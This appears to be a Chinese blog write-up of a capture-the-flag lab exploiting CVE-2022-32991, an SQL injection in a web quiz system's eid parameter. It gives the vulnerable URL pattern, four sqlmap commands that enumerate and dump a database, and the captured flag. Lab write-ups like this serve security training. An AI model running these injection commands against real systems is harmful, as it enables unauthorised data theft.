【春秋云境】CVE-2022-32991

访问靶场地址

 随便注册个账号能登录就

http://eci-2ze86owh7lf4tsy5z4d6.cloudeci1.ichunqiu.com/welcome.php?q=1

根据CVE官方:
welcome.php,发现基于 Web 的测验系统 v1.0 通过 eid 参数包含一个 SQL 注入漏洞。

所以我们接下来就找eid 参数即可。我们点击start,跳转到一个界面,我们发现,url中就存在了eid 参数

http://eci-2ze4ejuck500r1lw7g13.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34

 

 接下来我们使用bp,抓到点击start的包,放到txt文件中,命名为1.txt

 然后到sqlmap里面使用命令爆破出我要的数据

sqlmap -r 1.txt  --random-agent -p eid --batch --dbs
sqlmap -r 1.txt  --random-agent -p eid --batch -D "ctf" --tables
sqlmap -r 1.txt  --random-agent -p eid --batch -D "ctf" -T "flag" --columns
sqlmap -r 1.txt  --random-agent -p eid --batch -D "ctf" -T "flag" -C"flag" --dump

 

得到flag

flag{a80c9fd6-1607-4182-8bd2-edd92d05e67f}

 

  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

仲瑿

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值